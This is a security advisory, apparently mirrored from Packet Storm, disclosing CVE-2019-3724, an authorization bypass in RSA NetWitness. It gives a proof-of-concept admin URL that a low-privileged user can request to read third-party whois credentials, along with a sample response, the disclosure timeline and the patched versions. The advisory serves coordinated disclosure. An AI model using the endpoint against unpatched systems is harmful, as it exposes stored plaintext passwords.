Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormMantas JuskauskasPACKETSTORM:152943
HistoryMay 15, 2019 - 12:00 a.m.

RSA NetWitness Authorization Bypass

2019-05-1500:00:00
Mantas Juskauskas
packetstormsecurity.com
194

EPSS

0.005

Percentile

75.7%

JSON
`SEC Consult Vulnerability Lab Security Advisory < 20190515-0 >  
=======================================================================  
title: Authorization Bypass  
product: RSA NetWitness  
vulnerable version: <10.6.6.1, <11.2.1.1  
fixed version: 10.6.6.1, 11.2.1.1  
CVE number: CVE-2019-3724  
impact: Medium  
homepage: https://www.rsa.com  
found: 2018-09-18  
by: Mantas Juskauskas (Office Vilnius)  
SEC Consult Vulnerability Lab  
  
An integrated part of SEC Consult  
Europe | Asia | North America  
  
https://www.sec-consult.com  
  
=======================================================================  
  
Vendor description:  
-------------------  
"RSA provides more than 30,000 customers around the world with the essential  
security capabilities to protect their most valuable assets from cyber  
threats. With RSA's award-winning products, organizations effectively detect,  
investigate, and respond to advanced attacks; confirm and manage identities;  
and ultimately, reduce IP theft, fraud, and cybercrime."  
  
Source: https://www.rsa.com/en-us/company/about  
  
  
Business recommendation:  
------------------------  
By exploiting the vulnerability documented in this advisory an unauthorized  
attacker can access an administrative resource that may contain plain text  
credentials to a 3rd party system.  
  
The vendor provides a patch which should be installed on affected systems.  
  
  
Vulnerability overview/description:  
-----------------------------------  
The authorization mechanism provided by the platform is prone to an authorization  
bypass vulnerability, which can be easily exploited by authenticated (but low  
privileged) remote attackers for gaining access to administrative information  
including plaintext passwords.  
  
  
Proof of concept:  
-----------------  
A logged-in low privileged user (e.g. with role Analyst) is able to access  
an administrative resource by calling the following URL:  
  
https://[host]/admin/system/whois/properties  
  
After the above URL is accessed, the server returns the following HTTP response  
that contains sensitive information to a 3rd party whois service including  
plaintext passwords:  
  
HTTP/1.1 200 OK  
Server: nginx  
Date: [snip]  
Content-Type: application/json;charset=UTF-8  
Connection: close  
X-Frame-Options: SAMEORIGIN  
Cache-Control: no-cache, no-store, max-age=0, must-revalidate  
Pragma: no-cache  
Expires: Thu, 01 Jan 1970 00:00:00 GMT  
X-Content-Type-Options: nosniff  
Strict-Transport-Security: max-age=31536000 ; includeSubDomains  
X-XSS-Protection: 1; mode=block  
X-Frame-Options: SAMEORIGIN  
Set-Cookie: [snip]  
Content-Length: 795  
  
{"success":true,"data":{"queryUrl":"https://[snip]","authUrl":"https://[snip]","userId":"[snip]","pw":"[snip]","allowedRequests":100,"allowedRequestsInterval":60,"queueMaxSize":100000,"cacheMaxSize":50000,"refreshInterval":30,"waitForHttpRequests":true,"settings":{"query-url":"https://[snip]","queue-max-size":100000,"password":"[snip]","allowed-requests":100,"auth-url":"https://[snip]","user-id":"[snip]","refresh-interval-seconds":{"seconds":2592000,"milliSeconds":2592000000},"cache-max-size":50000,"wait-for-http-request":true,"allowed-requests-interval-seconds":{"seconds":60,"milliSeconds":60000}}}}  
  
  
  
Vulnerable / tested versions:  
-----------------------------  
The identified vulnerability has been verified to exist in the  
RSA NetWitness platform, version 11.1.0.1.  
  
According to the vendor, platform version 10 is also affected.  
  
The following versions are vulnerable:  
* <10.6.6.1  
* <11.2.1.1  
  
  
Vendor contact timeline:  
------------------------  
2018-10-01: Contacting vendor through PGP via [email protected]  
2018-10-02: Vendor acknowledges the information was received, forwards  
the info to the relevant department  
2018-10-11: Vendor confirms the impact of the authorization issue,  
starts to work on the remediation timeline  
2018-10-15: Vendor provides additional information  
2018-10-22: Contacting vendor to provide the remediation timeline  
2018-10-23: Further email exchange related to the remediation timeline  
2019-01-18: Vendor provides an update on the fix timeline  
2019-03-05: Asking for a status update  
2019-03-06: Vendor provides a status update on the release, patch for  
platform version 11 will be released in March, version 10  
Mid-April  
2019-04-01: Asking for a specific release date & further status update  
2019-04-01: Vendor: release is scheduled for 23rd April 2019, but may change,  
they will inform us  
2019-05-06: Asking for a status update; no answer  
2019-05-09: Noticed that the new release is online fow a while now, asking  
the vendor for a status update again  
2019-05-09: Vendor: published security advisory URL and CVE  
2019-05-15: SEC Consult advisory release  
  
  
Solution:  
---------  
The following patched versions address the identified issue:  
* 11.2.1.1  
* 10.6.6.1  
  
Security advisory of the vendor: https://community.rsa.com/docs/DOC-104202  
  
The vendor specifically told us that version 11.3 is not affected by this  
vulnerability.  
  
  
Workaround:  
-----------  
None  
  
  
Advisory URL:  
-------------  
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html  
  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
SEC Consult Vulnerability Lab  
  
SEC Consult  
Europe | Asia | North America  
  
About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It  
ensures the continued knowledge gain of SEC Consult in the field of network  
and application security to stay ahead of the attacker. The SEC Consult  
Vulnerability Lab supports high-quality penetration testing and the evaluation  
of new offensive and defensive technologies for our customers. Hence our  
customers obtain the most current information about vulnerabilities and valid  
recommendation about the risk profile of new technologies.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://www.sec-consult.com/en/career/index.html  
  
Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://www.sec-consult.com/en/contact/index.html  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Mail: research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: http://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult  
  
EOF M. Juskauskas / @2019  
  
`

Related

cvelist 1
nvd 1
cve 1
prion 1
cvelist
cvelist
CVE-2019-3724 Authorization Bypass VulnerabilityRSA Netwitness Platform
2019-05-15 15:45:11
nvd
nvd
CVE-2019-3724
2019-05-15 16:29:00
cve
cve
CVE-2019-3724
2019-05-15 16:29:00
prion
prion
Authorization
2019-05-15 16:29:00

EPSS

0.005

Percentile

75.7%

JSON
Related for PACKETSTORM:152943
cvelist1nvd1cve1prion1